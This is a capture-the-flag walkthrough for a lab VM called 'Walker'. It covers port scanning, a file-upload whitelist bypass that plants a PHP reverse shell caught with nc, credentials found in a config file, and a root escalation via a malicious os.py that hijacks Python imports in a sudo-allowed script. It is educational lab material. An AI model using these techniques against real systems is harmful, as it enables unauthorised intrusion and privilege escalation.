Walker

About the target machine

  • QQ group: 660930334

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 16:29 CST
Nmap scan report for 192.168.2.1
Host is up (0.00075s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00037s latency).
MAC Address: 08:00:27:2C:69:A0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.15
Host is up (0.00052s latency).
MAC Address: 08:00:27:0E:B2:03 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

Target IP: 192.168.2.15

2. Port scanning

(1) Full port scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 16:29 CST
Nmap scan report for 192.168.2.15
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:0E:B2:03 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.66 seconds

Open ports: 22, 80

(2) Detailed service scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 16:30 CST
Nmap scan report for 192.168.2.15
Host is up (0.00062s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: CyberSec Professional - Bootstrap 5 Resume/CV Template
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:0E:B2:03 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

  1. Port 22: SSH, used for remote login
  2. Port 80: HTTP

II. Web Exploitation

1. Path information disclosure

Visiting port 80 shows a resume page. The text "Web-Walk" is rendered in a different font from the rest of the page, which suggests it may be a path, so it is worth visiting.

Visit Web-Walk (Linux file systems are case sensitive, so both upper- and lower-case variants have to be tried).

This reveals a file upload feature.

2. File upload exploitation

Testing shows that only jpg, png, gif and webp images are accepted, i.e. a whitelist check.
After changing the file header and the MIME type the file is uploaded successfully, and the response leaks the upload path /var/www/html/web-walk/tmp/rev.php.

III. Getting a www-data Shell

Visiting the uploaded file /web-walk/tmp/rev.php gives a shell.

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.15] 33316
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting a stable shell

script /dev/null -c bash
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege Escalation

1. Getting the walk user

In the directory web-walk/tmp/.config/binwalk/config/ there is a file named extract.conf.

www-data@walker:/var/www/html/web-walk/tmp/.config/binwalk/config$ cat extract.conf
walk:walkwalkwalk

This gives a set of credentials: walk:walkwalkwalk

Switch to the walk user

www-data@walker:/home$ su walk
Password:
walk@walker:/home$ id
uid=1000(walk) gid=1000(walk) groups=1000(walk)

2. Getting root

Check the sudo privileges

walk@walker:/home$ sudo -l
Matching Defaults entries for walk on walker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User walk may run the following commands on walker:
(ALL) NOPASSWD: /usr/bin/python3 /home/walk/calc.py

The file /home/walk/calc.py can be run as root with python3 without a password.

Running calc.py reveals an arithmetic quiz that has to be answered 100 times.

walk@walker:~$ sudo /usr/bin/python3 /home/walk/calc.py
Solve 100 math questions. Get 80 correct to reveal the password!

six + three = 9
Correct! Total correct: 1/100

os hijacking

Write the malicious content used for the hijack

walk@walker:~$ echo "import os; os.system('/bin/bash')" > random.py
walk@walker:~$ echo "import os; os.system('/bin/bash')" > os.py

Note:
Naming the file os.py is a module hijacking attempt. When a Python program does import os, the interpreter first looks for a file named os.py in the current directory. If it finds one, it executes that file instead of importing the os module from the standard library. This means that if a legitimate program is run in a directory containing this malicious os.py, its import is hijacked and the malicious code runs without the program intending it.

Getting root
walk@walker:~$ sudo /usr/bin/python3 /home/walk/calc.py
root@walker:/home/walk# id
uid=0(root) gid=0(root) groups=0(root)

V. Getting the Flags
root@walker:/home/walk# cat /home/walk/user.txt /root/root.txt 
flag{walk-user-bububububu}
flag{walk-root-hahahahahaha}

Walker
http://miao-sec.github.io/Maze-sec/Walker/
Author
Miao
Published on
January 9, 2026
License
BY-MIAO